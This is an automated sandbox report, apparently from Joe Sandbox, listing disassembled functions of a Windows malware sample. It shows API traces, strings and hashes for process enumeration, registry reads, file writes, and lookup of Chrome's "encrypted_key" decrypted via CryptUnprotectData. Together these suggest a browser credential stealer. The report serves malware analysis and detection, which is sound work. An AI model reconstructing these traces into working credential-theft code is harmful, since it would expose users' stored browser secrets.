Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: d33f056b6c852928c4d15126b00d40c89cebefe686d0326f70ea0197145ca6d5
Instruction ID: f33f0653dcdc492c862df9fd682a796e438d13f7834308c095c7a0eb635792ab
Opcode Fuzzy Hash: d33f056b6c852928c4d15126b00d40c89cebefe686d0326f70ea0197145ca6d5
Instruction Fuzzy Hash: 3E21C83174121DABDB95EA35D8C8BBE7779AB4AB04F500529FD07B7A80DB705800C7A4

Function 00410630 Relevance: 7.6, APIs: 5, Instructions: 82commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00424770,00000000,00000001,004238C4,00410847,00000000,00000000,00000030,00410847,00000030,?,00000001,?,00000030,00000000,00000000), ref: 0041066D
SysAllocString.OLEAUT32(?), ref: 0041067B
_wtoi64.MSVCRT ref: 004106BA
SysFreeString.OLEAUT32(?), ref: 004106D9
SysFreeString.OLEAUT32(00000000), ref: 004106E0

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateInstance_wtoi64
String ID:
API String ID: 1817501562-0
Opcode ID: 43ba9061f7aaa9e19d061b62b181f6edba0a93b387e1e1e93ae49384c182bd82
Instruction ID: e53d099b401adf85f62220e949137e4eb195d033f19141da227454a58e436e12
Opcode Fuzzy Hash: 43ba9061f7aaa9e19d061b62b181f6edba0a93b387e1e1e93ae49384c182bd82
Instruction Fuzzy Hash: C121ADB1A40259AFCB00DFA8CC81AEEBBB9EF89310F10856AF509D7350C7359941CBA4

Function 00410200 Relevance: 7.6, APIs: 5, Instructions: 61processCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410228
Process32First.KERNEL32(00000000,00000128), ref: 00410238
Process32Next.KERNEL32(00000000,00000128), ref: 0041024A

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Process32Next.KERNEL32(00000000,00000128), ref: 0041029E
CloseHandle.KERNEL32(00000000), ref: 004102A9

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 562399079-0
Opcode ID: 3663534718aaebda766d9f339d95b4bc5c4fe485cb08fecaf46bd7da7b716aef
Instruction ID: b719f9b5f692b2ac1a9fa5fbc0615dd86b5ea1c9724ba4ed1b36593775d07faa
Opcode Fuzzy Hash: 3663534718aaebda766d9f339d95b4bc5c4fe485cb08fecaf46bd7da7b716aef
Instruction Fuzzy Hash: 111194326001186BDB15EB56DC06BFE737DAF84B00F00417EF605E2191DF785A4A8BE9

Function 0040FD30 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FD45
HeapAlloc.KERNEL32(00000000), ref: 0040FD4C
RegOpenKeyExA.KERNEL32(80000002,024F9050,00000000,00020119,00000000), ref: 0040FD6B
RegQueryValueExA.KERNEL32(00000000,0251E110,00000000,00000000,00000000,000000FF), ref: 0040FD86
RegCloseKey.ADVAPI32(00000000), ref: 0040FD90

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: d594ebf37586e0727eba3e8eb50fd5e32515ea22ef465c73045e54e17348c99c
Instruction ID: d8ad9fbc0ebf95024768528cc8c117c10f0d608e1468c19e6a8aac0af7a2ce34
Opcode Fuzzy Hash: d594ebf37586e0727eba3e8eb50fd5e32515ea22ef465c73045e54e17348c99c
Instruction Fuzzy Hash: 31F049B5600208BFE710ABA0EC49EAB7BBDEB48755F002158FA05E6280D6B099008BE0

Function 00406FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(0251B868,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,0000FFFF,?,?,?,?,?,?,?,0040B90C,0251D430), ref: 00406FE6

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

SetEnvironmentVariableA.KERNEL32(0251B868,00000000,00000000,?,00423404,?,0040B90C,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,004201E9), ref: 0040704F
LoadLibraryA.KERNEL32(024FA680,?,?,?,?,?,?,?,0040B90C,0251D430), ref: 00407064

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps, xrefs: 00406FE0, 00406FF9

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps
API String ID: 2929475105-2718090995
Opcode ID: e98fc9e29bf9c516a4c274fbadb32b23fbb376f5e8dc46e077ed8ea1aa7ec4c5
Instruction ID: 3674f494c0927660592f126ebe4d752a07d6e352543a463b58e450960cf84051
Opcode Fuzzy Hash: e98fc9e29bf9c516a4c274fbadb32b23fbb376f5e8dc46e077ed8ea1aa7ec4c5
Instruction Fuzzy Hash: 0041A471A049049FC724FFE5EC45AAA33BAEB44304F04953EE401672E1DFB8690ACF96

Function 004142A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

Strings

=OA, xrefs: 00414317, 004143E6, 0041431A

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID: =OA
API String ID: 4198075804-2781383965
Opcode ID: d4fdd997298575bf07402db06e935c8d0a5e5de1689ca80ceb76312ee19f8b5e
Instruction ID: c815e327a45929293fb115344fed98bb65589d785c8a70cda2a6ba11b763288e
Opcode Fuzzy Hash: d4fdd997298575bf07402db06e935c8d0a5e5de1689ca80ceb76312ee19f8b5e
Instruction Fuzzy Hash: D6416E729102089BDB24FFA1DC42BED7779AF54304F54903EF902765D2DB386A49CBA8

Function 00411280 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,?,00412B26,?), ref: 004112A0
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00412B26,?), ref: 004112CB
CloseHandle.KERNEL32(00000000,?,?,00412B26,?), ref: 004112D6

Strings

&+A, xrefs: 00411297, 004112AD, 004112DC

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: &+A
API String ID: 1065093856-3022679855
Opcode ID: ab91a6be0141dc41c7e029fefbd30ac49884893c0f4eac77bc71346d98b16b81
Instruction ID: e3584a1bd73763bab08ea096363b5fafa1b3dc09f005f439864d535dca2b5911
Opcode Fuzzy Hash: ab91a6be0141dc41c7e029fefbd30ac49884893c0f4eac77bc71346d98b16b81
Instruction Fuzzy Hash: 6FF08C316402187ADA20EF61EC07FEA376CDB01760F00526AFA09A65D0DBB06D4586E8

Function 0040B180 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 157stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00423544,004201E9), ref: 0040B224
lstrlenA.KERNEL32(00000000), ref: 0040B240

Strings

moz-extension+++, xrefs: 0040B275
^userContextId=4294967295, xrefs: 0040B267

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: 9a1d33cfbe7dd23d8660be9223c932da2d0490139008c9af3d56ba2c5ee2874c
Instruction ID: bbf64b21a70ba96c4e7d34df4571fb99f0a9ed04e141873abf1496de80f97976
Opcode Fuzzy Hash: 9a1d33cfbe7dd23d8660be9223c932da2d0490139008c9af3d56ba2c5ee2874c
Instruction Fuzzy Hash: B951FD729101186BDB24FB71DD529ED7378AF54704F44813EF806729D2EF386A0CCAA9

Function 004130F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000), ref: 00413120
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004131CD

Strings

ERROR, xrefs: 004131BF

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: ERROR
API String ID: 1659193697-2861137601
Opcode ID: f91c5940610a1bbd3b71c6d79c2c6b3e98147c3b684953eb7e6b6194c1f4900f
Instruction ID: fa0f609c73550b9905e9a4c97c517d243e9d7e9da07ba45fb7ad886b791ba49f
Opcode Fuzzy Hash: f91c5940610a1bbd3b71c6d79c2c6b3e98147c3b684953eb7e6b6194c1f4900f
Instruction Fuzzy Hash: 03315072A00204ABCB10FF65D846BDE7B78EB44754F10813EF915A76C1DB38A649CBD9

Function 0040BE30 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,?,?,?,?,?,0040EC99,?), ref: 0040BE7D

Part of subcall function 00406CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,bb@,00000000,00000000), ref: 00406CF7
Part of subcall function 00406CD0: LocalAlloc.KERNEL32(00000040,00000000,?,00406262,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406D06
Part of subcall function 00406CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,bb@,00000000,00000000), ref: 00406D1D
Part of subcall function 00406CD0: LocalFree.KERNEL32(?,?,00406262,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406D2C

Part of subcall function 00406D50: CryptUnprotectData.CRYPT32(0040EC94,00000000,00000000,00000000,00000000,00000000,?), ref: 00406D75
Part of subcall function 00406D50: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 00406D8D
Part of subcall function 00406D50: LocalFree.KERNEL32(?), ref: 00406DAE

Strings

, xrefs: 0040BEE1
"encrypted_key":", xrefs: 0040BE77

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"
API String ID: 2311102621-1472317035
Opcode ID: fc09b5ff9954c1a55f12e2731226f0ff62b6b4eb6131f917e92bb199d32800a6
Instruction ID: a7abf6cd44106865342de8c1123d42a84d3c3a1b941403826e444eadc47bdcfc
Opcode Fuzzy Hash: fc09b5ff9954c1a55f12e2731226f0ff62b6b4eb6131f917e92bb199d32800a6
Instruction Fuzzy Hash: E52184B6A101096BDB14EBB5DC41AEF777DDB40304F44417AF901B32D6EB38DA448AE8

Function 6C263060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C263095

Part of subcall function 6C2635A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C2EF688,00001000), ref: 6C2635D5
Part of subcall function 6C2635A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C2635E0
Part of subcall function 6C2635A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C2635FD
Part of subcall function 6C2635A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C26363F
Part of subcall function 6C2635A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C26369F
Part of subcall function 6C2635A0: __aulldiv.LIBCMT ref: 6C2636E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C26309F

